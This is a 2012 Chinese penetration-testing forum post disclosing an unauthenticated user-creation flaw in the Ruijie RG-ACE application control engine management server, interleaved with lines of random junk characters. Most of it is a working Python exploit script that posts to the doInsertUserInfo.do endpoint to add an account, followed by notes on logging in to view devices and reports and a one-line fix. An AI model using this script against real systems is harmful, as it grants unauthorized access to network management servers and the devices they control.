中国网络渗透测试联盟
标题:
锐捷应用控制引擎管理服务器可以增加用户
[打印本页]
作者:
admin
时间:
2012-12-10 10:16
标题:
锐捷应用控制引擎管理服务器可以增加用户
锐捷应用控制引擎管理服务器(RG-ACE系列应用控制引擎管理服务器V3.1.36.001,官网的连接
http://www.ruijie.com.cn/service/down-search.aspx
显示是最新版)可以根据没有权限验证的接口直接增加用户,连接设备,查看设备信息和报表(权限相对于默认的admin比较低)
, Y+ n, v; p- S, h' M
4 W* o% s2 v ~) t8 D
/ S, T- N8 h& ?" B
测试的具体版本是
! R% M4 n. t p; k4 X2 F; q
产品名称: 锐捷应用控制引擎
( f* ]4 K1 v, c
版本号: 3.1.36.001 TC
. \* Y, T+ q! ?0 U" N" u
编译时间: 201104291730
( L) J8 V. A* ]0 W3 p5 Y
& t2 L: [8 ]+ g, Q) q8 q
. |$ w( q8 v* G& K% W5 k
漏洞证明:
1 {9 A# j" n5 Y: {. T
' H, h2 I A, g8 ~9 H& H
- N, f! v; c' |& \4 J7 O
" J6 i6 x& Q( R- w( _
" ^8 |# K! J- i3 J- N) }( O
- Z2 ~- o" l g: p- ?* a
& @3 B, o: y+ K
执行脚本
: }% r# a; ]% D" p, z( [
#! /usr/bin/env python
: h' X1 ~7 Z' {8 `; E: d
#coding=gbk
: v( P; O6 h6 G1 H$ E
#RG-ACE管理服务器 V3.1.36.001
W, h1 I3 E+ H5 H8 ?* @
import urllib2, urllib,cookielib
, N) [9 g- `; A ?+ c% Y: w! b
url=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
+ ?( X1 K. r: @2 o! c7 \
opener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
k0 i" X) _- J. w$ w0 q/ d; P
opener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]
' f6 `$ K% O' q" K9 V
post=(("event","userManager.doInsertUserInfo"),
# W% g0 u) `$ j- e) ?
("useractionname","addButtonValue"),
7 `. F; g- \% ?9 S. s, m
("useropermanager","userManager"),
3 M! O1 I) l, B1 F5 w
("userName","t"), #######账号自己加
+ r/ b8 C. {! x! ]! y i
("pwd","aaaaaa"),######密码自己加
3 Q* q/ z) w: j* z' p1 b
("trueName","ad"),
7 u: k: X* v) J4 a: Q0 g5 l
("email",""),
" i1 @" u- R9 U1 W/ y
("mobilePhone",""),
" s' r( |$ ^3 U1 F9 p
("officePhone",""),
7 U9 v6 i2 } x
("addr",""),
/ L3 E" B8 ~( p+ ~4 @! N: |$ h" |
("submit","确定"))
9 u5 U" g! E' z6 t: b
urllib2.install_opener(opener)
3 }+ v" E( @- t! l) k+ x
p=urllib2.urlopen(url, urllib.urlencode(post)).read()
2 T' R8 {0 }: t9 c0 F
print "Done"
, i4 v! L. O3 U
; C( H' h( t. N/ [' u. \/ ]" S9 w
登录,连接设备
0 p) ]1 P" {; \8 V# \: A
4 E. d% ]& `/ G7 b9 [7 {
# T# O$ e% v& p0 l
1 D% V, M$ S. p Q8 `. P$ O
2 H6 P* R8 X* l+ r; L. ?
" s9 f0 U" m4 a) K. {
默认的管理员admin权限更大点
$ @; N0 e7 P' i+ ^) Z
- a- ?) n" A' [8 ^* D
( L; G) B, t- f
, ], ~0 D8 P3 M: c; s
! _4 b5 f( P: e% Y& I! ?
: R! k$ h1 {8 `# y* W
修复方案:
/ e; a' ~% ^% b& }0 y
加强对接口的权限验证
# ]/ W% K2 ^! Q n8 }
/ D( }9 A0 R- V* P
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2